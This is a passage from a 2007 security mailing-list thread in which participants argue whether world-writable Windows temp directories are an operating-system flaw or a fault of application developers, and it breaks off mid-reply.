THoG> global "Full Control" temp directory created by default.

THoG> t



THoG> - Original Message - 
THoG> From: "Roger A. Grimes" <[EMAIL PROTECTED]>

THoG> To: "Tim" <[EMAIL PROTECTED]>
THoG> Cc: ;
THoG> 
THoG> Sent: Friday, March 09, 2007 9:42 AM
THoG> Subject: RE: [Full-disclosure] Microsoft Windows Vista/2003/XP/2000 
file

THoG> management security issues


THoG> So, let me get this. An app storing sensitive data doesn't make its 
own

THoG> temp storage folders in a secure location, and instead relies upon one
THoG> of the few folders in Windows that all users have Full Control to, and
THoG> this is a Windows problem?  In Linux, if an app uses \tmp, is that a
THoG> Linux issue?

THoG> Sounds like a developer issue to me.

THoG> Roger

THoG> -Original Message-
THoG> From: Tim [mailto:[EMAIL PROTECTED]
THoG> Sent: Friday, March 09, 2007 11:20 AM
THoG> To: Roger A. Grimes
THoG> Cc: bugtraq@securityfocus.com; full-disclosure@lists.grok.org.uk
THoG> Subject: Re: [Full-disclosure] Microsoft Windows Vista/2003/XP/2000 
file

THoG> management security issues


THoG> I find your assessment somewhat short-sighted.  I have conducted code
THoG> reviews on several commercial apps which use C:\TEMP in very insecure
THoG